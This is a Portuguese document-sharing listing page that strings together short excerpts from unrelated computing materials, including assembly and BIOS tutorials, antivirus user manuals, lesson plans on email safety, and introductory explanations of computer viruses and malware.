Introdução à Internet Internet Introdução à Internet A Internet é a maior rede de computadores do Mundo, abrangendo praticamente todos os países. Uma rede de computadores é um conjunto de dois ou mais computadores interligados,

Leia mais

Unidade: Unidade Lógica e Aritmética e Registradores. Unidade I:

Unidade: Unidade Lógica e Aritmética e Registradores. Unidade I: Unidade: Unidade Lógica e Aritmética e Registradores Unidade I: 0 Unidade: Unidade Lógica e Aritmética e Registradores UNIDADE LÓGICA E ARITMÉTICA E REGISTRADORES O Processador é um chip com milhares de

Leia mais

Laboratório de Sistemas Processadores e Periféricos

Laboratório de Sistemas Processadores e Periféricos Laboratório de Sistemas Processadores e Periféricos Sistema de Interrupções do 8086 Prática 11 Gustavo G. Parma Assunto: sistema de interrupcões do 8086. Interrupções do DOS Objetivos: Apresentação do

Leia mais

Informática Básica. Licenciatura em Ciência da Informação. Tito Carlos S. Vieira. E-mail: tito@fe.up.pt. Tito Carlos S. Vieira tito@fe.up.

Informática Básica. Licenciatura em Ciência da Informação. Tito Carlos S. Vieira. E-mail: tito@fe.up.pt. Tito Carlos S. Vieira tito@fe.up. Informática Básica Licenciatura em Ciência da Informação Tito Carlos S. Vieira E-mail: tito@fe.up.pt t 1 Parte II Sistemas Operativos (Utilização do Windows) 2 O Sistema Operativo Windows (9x, 2000, XP,

Leia mais

8. Instruções de multiplicação e divisão

8. Instruções de multiplicação e divisão Cap8.1 8. Instruções de multiplicação e divisão 8.1 Instruções de multiplicação MUL fonte IMUL fonte MUL (multiply) -> usada com números em representação não-sinalizada IMUL (integer multiply) -> usada

Leia mais

Funcionamento básico de um computador

Funcionamento básico de um computador Funcionamento básico de um computador Processador Unidade de dados Unidade de controlo Arquitetura de computador básica Linguagem assembly Exemplos Arquitetura de Computadores Funcionamento básico de um

Leia mais

Unidade 2. ROM BIOS (Basic Input/Output System) Sistema Operativo. Interacção entre as diferentes partes num computador: software e hardware

Unidade 2. ROM BIOS (Basic Input/Output System) Sistema Operativo. Interacção entre as diferentes partes num computador: software e hardware Interacção entre as diferentes partes num computador: software e hardware Unidade 2 Utilização do ambiente operativo Windows Aplicações Sistema Operativo ROM BIOS Processador+memória+... Software aplicacional

Leia mais

geral@centroatlantico.pt www.centroatlantico.pt Impressão e acabamento: Inova 1ª edição: Dezembro de 2003 ISBN: 972-8426-82-8 Depósito legal: /03

geral@centroatlantico.pt www.centroatlantico.pt Impressão e acabamento: Inova 1ª edição: Dezembro de 2003 ISBN: 972-8426-82-8 Depósito legal: /03 MANTENHA-SE INFORMADO Envie um e-mail* para software@centroatlantico.pt para ser informado sempre que existirem actualizações a esta colecção ou outras notícias importantes sobre o McAfee VirusScan 8.

Leia mais

CRIANDO UM SISTEMA OPERACIONAL BÁSICO Por: Fernando Birck aka Fergo

CRIANDO UM SISTEMA OPERACIONAL BÁSICO Por: Fernando Birck aka Fergo CRIANDO UM SISTEMA OPERACIONAL BÁSICO Por: Fernando Birck aka Fergo 2 SUMÁRIO 1. Introdução 3 2. Aplicativos 4 3. Processo de boot 5 4. Interrupts 6 5. Criando o Loader 7 6. Criando o Kernel 9 7. Gravando

Leia mais

ZS Rest. Manual Avançado. Instalação em Rede. v2011

ZS Rest. Manual Avançado. Instalação em Rede. v2011 Manual Avançado Instalação em Rede v2011 1 1. Índice 2. Introdução... 2 3. Hardware... 3 b) Servidor:... 3 c) Rede:... 3 d) Pontos de Venda... 4 4. SQL Server... 5 e) Configurar porta estática:... 5 5.

Leia mais

[Documentação de Utilização Correio Electrónico dos Funcionários da ESTG]

[Documentação de Utilização Correio Electrónico dos Funcionários da ESTG] [Documentação de Utilização Correio Electrónico dos Funcionários da ESTG] Unidade De Administração de Sistemas Serviços Informáticos Instituto Politécnico de Leiria 09-06-2010 Controlo do Documento Autor

Leia mais

PLANO DA LIÇÃO Segurança: Código Malicioso no Correio Electrónico

PLANO DA LIÇÃO Segurança: Código Malicioso no Correio Electrónico PLANO DA LIÇÃO Segurança: Código Malicioso no Correio Electrónico Idade Recomendada: 9 anos Guia da Lição Esta lição centra-se nas questões de segurança virtual que levantam os anexos de correio electrónico.

Leia mais

Administração de Empresas Ciências Contábeis Informática Aplicada

Administração de Empresas Ciências Contábeis Informática Aplicada Administração de Empresas Ciências Contábeis Informática Aplicada Prof. Renato M. renato5150@hotmail.com Aula 2 São pequenos programas feitos geralmente em linguagem de máquina, e que possuem a característica

Leia mais

Consulte a contra-capa para uma instalação rápida.

Consulte a contra-capa para uma instalação rápida. Manual do Utilizador Consulte a contra-capa para uma instalação rápida. Protegemos mais pessoas das crescentes ameaças on-line do que qualquer outra empresa no mundo. Preocupa-se com o nosso Ambiente,

Leia mais

1. SINTAXE DA LINGUAGEM ASSEMBLY

1. SINTAXE DA LINGUAGEM ASSEMBLY 1. SINTAXE DA LINGUAGEM ASSEMBLY Antes de se escrever em assembly, é conveniente construir um fluxograma do programa. Um fluxograma não faz referência à linguagem a utilizar, pelo que pode ser utilizado

Leia mais

Criptografia e Segurança de Comunicações. Comunicações SPAM

Criptografia e Segurança de Comunicações. Comunicações SPAM Curiosidade, não faz parte da avaliação Criptografia e Segurança de Comunicações SPAM SPAM : 1/10 SPAM introdução (1) SPAM 1 mensagem Email não solicitada, dividida por Boato ( Hoax ): história falsa para

Leia mais

Guia de Estudo. Windows XP

Guia de Estudo. Windows XP Tecnologias da Informação e Comunicação Guia de Estudo Windows XP O Sistema Operativo (SO) em estudo é o Windows XP, SO de interface gráfico para com o utilizador (GUI) e, desenvolvido pela Microsoft(R).

Leia mais

Consulte a contra-capa para uma instalação rápida.

Consulte a contra-capa para uma instalação rápida. Manual do Utilizador Consulte a contra-capa para uma instalação rápida. Protegemos mais pessoas das crescentes ameaças on-line do que qualquer outra empresa no mundo. Preocupa-se com o nosso Ambiente,

Leia mais

604 wifi. Visite www.archos.com/manuals para transferir a versão mais recente deste manual.

604 wifi. Visite www.archos.com/manuals para transferir a versão mais recente deste manual. 604 wifi FUNÇÕES WIFI e Internet Suplemento ao Manual do Utilizador ARCHOS 504/604 Versão 1.2 Visite www.archos.com/manuals para transferir a versão mais recente deste manual. Este manual contém informações

Leia mais

Uso de interrupções de BIOS/DOS

Uso de interrupções de BIOS/DOS Uso de interrupções de BIOS/DOS Prof. Ronaldo Hüsemann Mapa de Memória FFFFFh F0000h C0000h B8000h A0000h BIOS (ROM) Reservado Memória de Vídeo (Texto e Gráfica) Memória de Vídeo (Parte Gráfica) Área para

Leia mais

Combater e prevenir vírus em seu computador

Combater e prevenir vírus em seu computador Combater e prevenir vírus em seu computador Definição de vírus, worms, hoaxes, Tróias e vulnerabilidades de segurança Instruções para remover e evitar vírus Vulnerabilidades do sistema e ameaças de segurança

Leia mais

Software de Telecomunicações. Virus informáticos:2ª parte. WindowsNT história

Software de Telecomunicações. Virus informáticos:2ª parte. WindowsNT história Software de Telecomunicações Virus informáticos:2ª parte Prof RG Crespo Software de Telecomunicações Virus-II : 1/48 WindowsNT história O conhecido sistema operativo da MicroSoft passou por fases distintas:

Leia mais

Guia de Início Rápido Antivirus Pro 2009 Importante! Leia atentamente a secção Activação do produto neste guia. As informações contidas nesta secção são essenciais para manter o seu computador protegido.

Leia mais

[Documentação de Utilização Correio Electrónico dos Estudantes da ESTG]

[Documentação de Utilização Correio Electrónico dos Estudantes da ESTG] [Documentação de Utilização Correio Electrónico dos Estudantes da ESTG] Unidade De Administração de Sistemas Serviços Informáticos Instituto Politécnico de Leiria 10-07-2009 Controlo do Documento Autor

Leia mais

Vírus Professor: Pedro R3 Junior. Vírus

Vírus Professor: Pedro R3 Junior. Vírus Conceitos Conceitos Pequenos segmentos de código com capacidade de se agregar ao código de outros programas. Além do mecanismo de reprodução disparado a cada vez que o programa infectado é executado, eles

Leia mais

Linguagem de Montagem

Linguagem de Montagem Linguagem de Montagem Organização do PC Slides baseados em material associado ao livro Introduction to Assembly Language Programming, Sivarama Dandamudi 1 Processador Pentium Lançado em 1993 Versão melhorada

Leia mais

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 11

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 11 Sumário: O disco rígido e a disquete estrutura física. Como os dados são armazenados fisicamente. Como o MS-DOS organiza o disco. O registo de boot. Aula Teórica 11 Leitura Recomendada: Capítulos 28 e

Leia mais

Escola Básica 2, 3 de Lamaçães Planificação Anual 2007/08 Tecnologias de Informação e Comunicação

Escola Básica 2, 3 de Lamaçães Planificação Anual 2007/08 Tecnologias de Informação e Comunicação Escola Básica 2, 3 de Lamaçães Planificação Anual 2007/08 Tecnologias de Informação e Comunicação Unidade de Ensino/Aprendizagem Tecnologias da Informação e Comunicação Conceitos Introdutórios Conceitos

Leia mais

PROFESSOR: Flávio Antônio Benardo E-mail: flavioufrpe@yahoo.com.br Vírus de computador

PROFESSOR: Flávio Antônio Benardo E-mail: flavioufrpe@yahoo.com.br Vírus de computador ESCOLA TÉCNICA DE PALMARES PROFESSOR: Flávio Antônio Benardo E-mail: flavioufrpe@yahoo.com.br Vírus de computador DEFINIÇÃO É um pequeno programa que se autocópia e/ou faz alterações em outros arquivos

Leia mais

Ricardo Campos [ h t t p : / / w w w. c c c. i p t. p t / ~ r i c a r d o ] Segurança em Redes. Segurança em Redes

Ricardo Campos [ h t t p : / / w w w. c c c. i p t. p t / ~ r i c a r d o ] Segurança em Redes. Segurança em Redes Autoria Esta apresentação foi desenvolvida por Ricardo Campos, docente do Instituto Politécnico de Tomar. Encontra-se disponível na página web do autor no link Publications ao abrigo da seguinte licença:

Leia mais

1. Posso proteger qualquer tipo de conta de correio com este serviço?

1. Posso proteger qualquer tipo de conta de correio com este serviço? 1 2 Conteúdo 1. Posso proteger qualquer tipo de conta de correio com este serviço?... 3 2. Como posso subscrever este serviço?... 3 3. O que é feito pelo PANDA MANAGED EMAIL PROTECTION ao spam detectado

Leia mais

Netiqueta (ou Netiquette)

Netiqueta (ou Netiquette) Netiqueta (ou Netiquette) Conjunto de atitudes e normas recomendadas (não impostas) para que todos os utilizadores possam comunicar através da Internet de um forma cordial e agradável. Evite a utilização

Leia mais

UNIVERSIDADE FEDERAL DE UBERLÂNDIA Faculdade de Computação Curso de Introdução à Informática Prof: Anilton Joaquim da Silva / Ezequiel Roberto Zorzal

UNIVERSIDADE FEDERAL DE UBERLÂNDIA Faculdade de Computação Curso de Introdução à Informática Prof: Anilton Joaquim da Silva / Ezequiel Roberto Zorzal UNIVERSIDADE FEDERAL DE UBERLÂNDIA Faculdade de Computação Curso de Introdução à Informática Prof: Anilton Joaquim da Silva / Ezequiel Roberto Zorzal AULA Informática: Aplicações e Benefícios Advocacia

Leia mais

Controlo de acessos em rede

Controlo de acessos em rede Manual do software Controlo de acessos em rede Access (Versão do software: 1.0.2) (Versão do documento: 1.0.9) Para mais informação, visite o nosso website: www.simonalert.com Página - 1 - Para mais informação,

Leia mais

Arquitectura de Computadores. Dicas e Truques do Assembly do P3

Arquitectura de Computadores. Dicas e Truques do Assembly do P3 Instituto Superior Técnico Arquitectura de Computadores Dicas e Truques do Assembly do P3 Prof. Renato Nunes Versão 2.0 03/03/2008 1. Introdução Este documento contém vários pedaços de código, instruções

Leia mais

MALWARE`S. Disciplina : Informática ll - Válquer Coêlho

MALWARE`S. Disciplina : Informática ll - Válquer Coêlho MALWARE`S Disciplina : Informática ll - Válquer Coêlho MALWARE O termo software; é proveniente do inglês malicious É destinado a se infiltrar em um sistema de computador alheio de forma ilícita, com o

Leia mais

Sérgio Cabrera Professor Informática 1

Sérgio Cabrera Professor Informática 1 1. A tecnologia que utiliza uma rede pública, como a Internet, em substituição às linhas privadas para implementar redes corporativas é denominada. (A) VPN. (B) LAN. (C) 1OBaseT. (D) 1OBase2. (E) 100BaseT.

Leia mais

Manual do Utilizador PN: 11893486

Manual do Utilizador PN: 11893486 Manual do Utilizador PN: 11893486 Norton 360 Manual do Utilizador Documentação versão 1.0 Copyright 2007 Symantec Corporation. Todos os direitos reservados. O Software Licenciado e a Documentação são considerados

Leia mais

Introdução à programação em linguagem assembly

Introdução à programação em linguagem assembly Introdução à programação em linguagem assembly Espaço de endereçamento Instruções de acesso à memória Modos de endereçamento Diretivas Tabelas Pilha Rotinas Arquitetura de Computadores Introdução à programação

Leia mais

ISCAP. Pág. 1. Ana Paula Teixeira

ISCAP. Pág. 1. Ana Paula Teixeira Pág. 1 Noções Introdutórias Um Sistema Operativo (SO) é conjunto de programas que comandam e controlam o funcionamento do CPU (Unidade Central de Processamento) e periféricos além de supervisionar a execução

Leia mais

NETWORK SECURITY. Necessidade de Segurança. Definição de Segurança. Definição de Bens. Definição de Bens. Princípios para proteger uma rede

NETWORK SECURITY. Necessidade de Segurança. Definição de Segurança. Definição de Bens. Definição de Bens. Princípios para proteger uma rede Necessidade de Segurança NETWORK SECURITY O propósito das redes é o de partilhar recursos, no entanto haverá sempre o risco desses recursos serem acedidos por pessoal não autorizado. Princípios para proteger

Leia mais

Sistemas Operativos I

Sistemas Operativos I Componentes de um Sistema Operativo Maria João Viamonte / Luis Lino Ferreira Fevereiro de 2006 Sistema Operativo Um Sistema Operativo pode ser visto como um programa de grande complexidade, responsável

Leia mais

Manual do Utilizador

Manual do Utilizador Manual do Utilizador Norton 360 Online Manual do Utilizador Documentação versão 2.0 Copyright 2008 Symantec Corporation. Todos os direitos reservados. O Software Licenciado e a Documentação são considerados

Leia mais

Conjunto de instruções. O Conjunto de Instruções. Conjunto de instruções. Instruções típicas. Instruções típicas. Instruções típicas

Conjunto de instruções. O Conjunto de Instruções. Conjunto de instruções. Instruções típicas. Instruções típicas. Instruções típicas Conjunto de instruções O Conjunto de Instruções ISA Instruction Set Architecture Alguns conceitos... Linguagem máquina Combinação de 0 s e 1 s organizados segundo palavras que são as instruções que o processador

Leia mais

Consulte a contra-capa para uma instalação rápida.

Consulte a contra-capa para uma instalação rápida. Manual do Utilizador Consulte a contra-capa para uma instalação rápida. Protegemos mais pessoas das crescentes ameaças on-line do que qualquer outra empresa no mundo. Preocupa-se com o nosso Ambiente,

Leia mais

Controle Parental. Introdução

Controle Parental. Introdução Controle Parental Introdução O acesso das crianças à Internet suscita algumas preocupações aos pais e educadores/as. Contudo, tal como na vida real ou no uso de outros meios de comunicação, os adultos

Leia mais

Redes de Computadores. Trabalho de Laboratório Nº8

Redes de Computadores. Trabalho de Laboratório Nº8 Redes de Computadores Curso de Eng. Informática Curso de Eng. de Electrónica e Computadores Trabalho de Laboratório Nº8 Configuração e utilização do FTP 2004/2005 1 Objectivo Configuração de um servidor

Leia mais

Consulte a contra-capa para uma instalação rápida.

Consulte a contra-capa para uma instalação rápida. Manual do Utilizador Consulte a contra-capa para uma instalação rápida. Preocupa-se com o nosso Ambiente, É o que está certo fazer. A Symantec removeu a capa deste manual para reduzir as Pegadas Ambientais

Leia mais

INFORMÁTICA PARA GESTÃO I Curso Superior de Gestão de Marketing

INFORMÁTICA PARA GESTÃO I Curso Superior de Gestão de Marketing INFORMÁTICA PARA GESTÃO I Curso Superior de Gestão de Marketing Docente (Teóricas): Contacto: vmnf@yahoo.com ou vmnf@ipam.pt Web: http://www.vmnf.net/ipam/ig1 Aula 3 Sumário Introdução à Informática (2/2)

Leia mais

Apresentação de SISTEMAS OPERATIVOS

Apresentação de SISTEMAS OPERATIVOS Apresentação de SISTEMAS OPERATIVOS Curso Profissional de Técnico de Gestão e Programação de Sistemas Informáticos MÓDULO V Configuração Avançada de Sistemas Operativos Servidores Duração: 42 tempos Conteúdos

Leia mais

Curso de Iniciação ao Access Basic (I) CONTEÚDOS

Curso de Iniciação ao Access Basic (I) CONTEÚDOS Curso de Iniciação ao Access Basic (I) CONTEÚDOS 1. A Linguagem Access Basic. 2. Módulos e Procedimentos. 3. Usar o Access: 3.1. Criar uma Base de Dados: 3.1.1. Criar uma nova Base de Dados. 3.1.2. Criar

Leia mais

NOVO Panda Antivirus 2007 Manual resumido sobre a instalação, registo e serviços Importante! Leia a secção de registo on-line deste manual atentamente. As informações contidas nesta secção são essenciais

Leia mais

Instruções de Instalação e Licenciamento. Notas Prévias. Versão 1.5.

Instruções de Instalação e Licenciamento. Notas Prévias. Versão 1.5. Instruções de Instalação e Licenciamento Versão 1.5. Notas Prévias Introdução Instruções de Instalação/Actualização Instruções de Licenciamento Notas Prévias Verificações prévias: Os postos de trabalho

Leia mais

ORGANIZAÇÃO BÁSICA DE COMPUTADORES E LINGUAGEM DE MONTAGEM

ORGANIZAÇÃO BÁSICA DE COMPUTADORES E LINGUAGEM DE MONTAGEM Cap1.1 ORGANIZAÇÃO BÁSICA DE COMPUTADORES E LINGUAGEM DE MONTAGEM 1. Conceitos básicos Bit = BInary digit = vale sempre 0 ou 1 elemento básico de informação Byte Word = 8 bits processados em paralelo (ao

Leia mais

Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta

Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta o sistema, faz cópias de si mesmo e tenta se espalhar

Leia mais

2.1.10. Trabalhar com CDs e DVDs

2.1.10. Trabalhar com CDs e DVDs 2.1.10. Trabalhar com CDs e DVDs Os procedimentos utilizados para gravar informação num CD ou num DVD variam conforme a forma como estes forem formatados. A formatação é efectuada em discos vazios e consiste

Leia mais

Aula Prática 1 Introdução à programação Assembly no DOS usando TASM Bruno Silva bs@cin.ufpe.br lauro Moura lauromoura@gmail.com

Aula Prática 1 Introdução à programação Assembly no DOS usando TASM Bruno Silva bs@cin.ufpe.br lauro Moura lauromoura@gmail.com Interface Hardware Software Aula Prática 1 Introdução à programação Assembly no DOS usando TASM Bruno Silva bs@cin.ufpe.br lauro Moura lauromoura@gmail.com Conteúdo Visão geral do processo TASM / TLINK

Leia mais

Linguagem de Montagem 2. Operações e Operandos

Linguagem de Montagem 2. Operações e Operandos Linguagem de Montagem 2 Operações e Operandos Revisão Para executar uma tarefa qualquer, um computador precisa receber instruções precisas sobre o que fazer Esse conjunto de instruções chamamos de algoritmo

Leia mais

FrontPage Express. Manuel Cabral Reis UTAD Departamento de Engenharias Curso de Ciências da Comunicação Disciplina de Introdução à Informática

FrontPage Express. Manuel Cabral Reis UTAD Departamento de Engenharias Curso de Ciências da Comunicação Disciplina de Introdução à Informática FrontPage Express Manuel Cabral Reis UTAD Departamento de Engenharias Curso de Ciências da Comunicação Disciplina de Introdução à Informática O que é o FrontePage Express Para aceder ao programa que vai

Leia mais

Manual de Recuperação, Cópias de Segurança e Resolução de Problemas. Crie os suportes de recuperação imediatamente após a configuração.

Manual de Recuperação, Cópias de Segurança e Resolução de Problemas. Crie os suportes de recuperação imediatamente após a configuração. Manual de Recuperação, Cópias de Segurança e Resolução de Problemas Crie os suportes de recuperação imediatamente após a configuração. Conteúdo Introdução... 3 Acerca da recuperação... 3 Acerca da cópia

Leia mais

Sistema Gráfico VGA. Sistema Gráfico VGA

Sistema Gráfico VGA. Sistema Gráfico VGA Sistema Gráfico VGA Rotinas Vídeo VGA: Modo Texto (03h) Procedure SetMode(M:Byte);Far;Assembler; Solução. (Nota serve para modo gráfico) Procedure ClearTextScreen(Atr:Byte);Far;Assembler; Solução Procedure

Leia mais

Estrutura de um endereço de Internet

Estrutura de um endereço de Internet Barras do Internet Explorer Estrutura de um endereço de Internet Na Internet, cada servidor tem uma identificação única, correspondente ao endereço definido no IP (Internet Protocol). Esse endereço é composto

Leia mais

Malwares Segurança da Informação. S.O.S. Concursos Prof: Tiago Furlan Lemos

Malwares Segurança da Informação. S.O.S. Concursos Prof: Tiago Furlan Lemos Malwares Segurança da Informação. S.O.S. Concursos Prof: Tiago Furlan Lemos Malware O termo malware é proveniente do inglês malicious software; é um software destinado a se infiltrar em um sistema de computador

Leia mais

GUIA DE ACESSO E UTILIZAÇÃO DO

GUIA DE ACESSO E UTILIZAÇÃO DO GUIA DE ACESSO E UTILIZAÇÃO DO GMAIL utilizador 2010 O presente manual pretende dar indicações suficientes para que o utilizador possa utilizador o correio electrónico disponibilizado pela empresa GOOGLE

Leia mais

O AMBIENTE DE TRABALHO DO WINDOWS

O AMBIENTE DE TRABALHO DO WINDOWS O AMBIENTE DE TRABALHO DO WINDOWS O Windows funciona como um Sistema Operativo, responsável pelo arranque do computador. Um computador que tenha o Windows instalado, quando arranca, entra directamente

Leia mais

http://www.risesecurity.org Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org

http://www.risesecurity.org Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org Ataques Polimórficos Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org A idéia - Detectores de intrusos utilizam-se de assinaturas de ataques para identificação dos mesmos - Sistemas

Leia mais

Conceitos Sistema da informação e comunicação N.º de Aulas

Conceitos Sistema da informação e comunicação N.º de Aulas PLANIFICAÇÃO AGRUPAMENTO ANUAL - DE TECNOLOGIAS ANO ESCOLAS LECTIVO DR. VIEIRA DE CARVALHO 9º ANO 2008/2009 DA INFORMAÇÃO E COMUNICAÇÃO Tecnologias 1º Período Conceitos Sistema da informação e comunicação

Leia mais

PLANO DA LIÇÃO Correio Electrónico e Segurança Virtual

PLANO DA LIÇÃO Correio Electrónico e Segurança Virtual PLANO DA LIÇÃO Correio Electrónico e Segurança Virtual Idade Recomendada: 7 anos Guia da Lição Os alunos participarão numa discussão de grupo moderada pelo professor de modo a adquirirem uma compreensão

Leia mais

MANUAL DA TRANSFERÊNCIA ELECTRÓNICA DE DADOS

MANUAL DA TRANSFERÊNCIA ELECTRÓNICA DE DADOS MANUAL DA TRANSFERÊNCIA ELECTRÓNICA DE DADOS O relacionamento com os prestadores convencionados tem vindo a sustentar-se na utilização de transferências electrónicas de dados (TED) que permitem alterar

Leia mais

Actualização, Cópias de Segurança e Recuperação de Software

Actualização, Cópias de Segurança e Recuperação de Software Actualização, Cópias de Segurança e Recuperação de Software Manual do utilizador Copyright 2006 Hewlett-Packard Development Company, L.P. Microsoft e Windows são marcas registadas da Microsoft Corporation

Leia mais

Gerenciador de Boot Simples

Gerenciador de Boot Simples Gerenciador de Boot Simples Este tutorial é uma simples caminhada através de um Gerenciador de Boot Hello World. Este, como qualquer outro gestor, tem que obedecer a algumas regras. Termos utilizados:

Leia mais

SEGURANÇA DA INFORMAÇÃO. Aguinaldo Fernandes Rosa

SEGURANÇA DA INFORMAÇÃO. Aguinaldo Fernandes Rosa SEGURANÇA DA INFORMAÇÃO DICAS Aguinaldo Fernandes Rosa Especialista em Segurança da Informação Segurança da Informação Um computador (ou sistema computacional) é dito seguro se este atende a três requisitos

Leia mais